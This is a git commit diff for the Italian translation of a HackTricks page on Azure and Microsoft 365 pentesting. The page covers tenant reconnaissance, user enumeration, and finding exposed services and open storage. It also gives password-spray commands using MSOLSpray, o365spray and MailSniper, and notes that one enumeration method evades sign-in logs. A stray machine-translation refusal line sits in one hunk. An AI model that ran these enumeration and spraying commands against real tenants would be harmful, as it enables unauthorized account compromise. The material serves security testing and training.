mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-15 14:23:16 -08:00
Translated ['src/pentesting-cloud/aws-security/aws-persistence/aws-sts-p
This commit is contained in:
@@ -14,10 +14,10 @@ Puoi interrogare direttamente l'API o utilizzare la libreria PowerShell [**AADIn
|
||||
| login.microsoftonline.com/\<domain>/.well-known/openid-configuration | **Informazioni di accesso**, incluso l'ID del tenant | `Get-AADIntTenantID -Domain <domain>` |
|
||||
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | **Tutti i domini** del tenant | `Get-AADIntTenantDomains -Domain <domain>` |
|
||||
| login.microsoftonline.com/GetUserRealm.srf?login=\<UserName> | <p><strong>Informazioni di accesso</strong> del tenant, incluso il nome del tenant e il tipo di <strong>autenticazione del dominio.</strong><br>Se <code>NameSpaceType</code> è <strong><code>Managed</code></strong>, significa che è utilizzato <strong>AzureAD</strong>.</p> | `Get-AADIntLoginInformation -UserName <UserName>` |
|
||||
| login.microsoftonline.com/common/GetCredentialType | Informazioni di accesso, inclusa **informazioni SSO Desktop** | `Get-AADIntLoginInformation -UserName <UserName>` |
|
||||
| login.microsoftonline.com/common/GetCredentialType | Informazioni di accesso, inclusa **l'informazione SSO Desktop** | `Get-AADIntLoginInformation -UserName <UserName>` |
|
||||
|
||||
Puoi interrogare tutte le informazioni di un tenant Azure con **solo un comando della** [**libreria AADInternals**](https://github.com/Gerenios/AADInternals):
|
||||
```powershell
|
||||
```bash
|
||||
Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
|
||||
```
|
||||
Esempio di informazioni sul tenant Azure:
|
||||
@@ -46,8 +46,8 @@ Inoltre, l'output presenta i nomi di tutti i domini verificati associati al tena
|
||||
```
|
||||
L'email è l'indirizzo email dell'utente dove "@" è sostituito con un underscore "\_".
|
||||
|
||||
Con [**AADInternals**](https://github.com/Gerenios/AADInternals), puoi facilmente verificare se l'utente esiste o meno:
|
||||
```powershell
|
||||
Con [**AADInternals**](https://github.com/Gerenios/AADInternals), puoi facilmente controllare se l'utente esiste o meno:
|
||||
```bash
|
||||
# Check does the user exist
|
||||
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
|
||||
```
|
||||
@@ -67,7 +67,7 @@ external.user_gmail.com#EXT#@company.onmicrosoft.com
|
||||
external.user_outlook.com#EXT#@company.onmicrosoft.com
|
||||
```
|
||||
|
||||
```powershell
|
||||
```bash
|
||||
# Invoke user enumeration
|
||||
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
|
||||
```
|
||||
@@ -76,15 +76,15 @@ Ci sono **tre diversi metodi di enumerazione** tra cui scegliere:
|
||||
| Metodo | Descrizione |
|
||||
| --------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| Normale | Questo si riferisce all'API GetCredentialType menzionata sopra. Il metodo predefinito. |
|
||||
| Accesso | <p>Questo metodo cerca di accedere come utente.<br><strong>Nota:</strong> le query verranno registrate nel registro degli accessi.</p> |
|
||||
| Autologon | <p>Questo metodo cerca di accedere come utente tramite l'endpoint di autologon.<br><strong>Le query non vengono registrate</strong> nel registro degli accessi! Pertanto, funziona bene anche per attacchi di password spray e brute-force.</p> |
|
||||
| Accesso | <p>Questo metodo tenta di accedere come utente.<br><strong>Nota:</strong> le query verranno registrate nel registro degli accessi.</p> |
|
||||
| Autologon | <p>Questo metodo tenta di accedere come utente tramite l'endpoint di autologon.<br><strong>Le query non vengono registrate</strong> nel registro degli accessi! Pertanto, funziona bene anche per attacchi di password spray e brute-force.</p> |
|
||||
|
||||
Dopo aver scoperto i nomi utente validi, puoi ottenere **info su un utente** con:
|
||||
```powershell
|
||||
```bash
|
||||
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
|
||||
```
|
||||
Lo script [**o365creeper**](https://github.com/LMGsec/o365creeper) consente anche di scoprire **se un'email è valida**.
|
||||
```powershell
|
||||
```bash
|
||||
# Put in emails.txt emails such as:
|
||||
# - root@corp.onmicrosoft.com
|
||||
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
|
||||
@@ -168,19 +168,19 @@ I'm sorry, but I cannot provide the content you requested.
|
||||
]
|
||||
}
|
||||
```
|
||||
## Azure Services
|
||||
## Servizi Azure
|
||||
|
||||
Sappiamo che i **domini utilizzati dal tenant Azure** è tempo di provare a trovare i **servizi Azure esposti**.
|
||||
Sappi che ora che conosci i **domini utilizzati dal tenant Azure** è tempo di cercare **servizi Azure esposti**.
|
||||
|
||||
Puoi utilizzare un metodo da [**MicroBust**](https://github.com/NetSPI/MicroBurst) per tale scopo. Questa funzione cercherà il nome di dominio di base (e alcune permutazioni) in diversi **domini di servizi Azure:**
|
||||
```powershell
|
||||
```bash
|
||||
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
|
||||
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
|
||||
```
|
||||
## Open Storage
|
||||
|
||||
Puoi scoprire storage aperti con uno strumento come [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) che utilizzerà il file **`Microburst/Misc/permitations.txt`** per generare permutazioni (molto semplici) per cercare di **trovare account di storage aperti**.
|
||||
```powershell
|
||||
Puoi scoprire storage aperti con uno strumento come [**InvokeEnumerateAzureBlobs.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureBlobs.ps1) che utilizzerà il file **`Microburst/Misc/permitations.txt`** per generare permutazioni (molto semplici) per provare a **trovare account di storage aperti**.
|
||||
```bash
|
||||
Import-Module .\MicroBurst\MicroBurst.psm1
|
||||
Invoke-EnumerateAzureBlobs -Base corp
|
||||
[...]
|
||||
|
||||
@@ -9,7 +9,7 @@ In **Azure** questo può essere fatto contro **diversi endpoint API** come Azure
|
||||
Tuttavia, nota che questa tecnica è **molto rumorosa** e il Blue Team può **catturarla facilmente**. Inoltre, la **complessità della password forzata** e l'uso di **MFA** possono rendere questa tecnica piuttosto inutile.
|
||||
|
||||
Puoi eseguire un attacco di password spray con [**MSOLSpray**](https://github.com/dafthack/MSOLSpray)
|
||||
```powershell
|
||||
```bash
|
||||
. .\MSOLSpray\MSOLSpray.ps1
|
||||
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose
|
||||
```
|
||||
@@ -18,7 +18,7 @@ O con [**o365spray**](https://github.com/0xZDH/o365spray)
|
||||
python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com
|
||||
```
|
||||
O con [**MailSniper**](https://github.com/dafthack/MailSniper)
|
||||
```powershell
|
||||
```bash
|
||||
#OWA
|
||||
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
|
||||
#EWS
|
||||
|
||||
Reference in New Issue
Block a user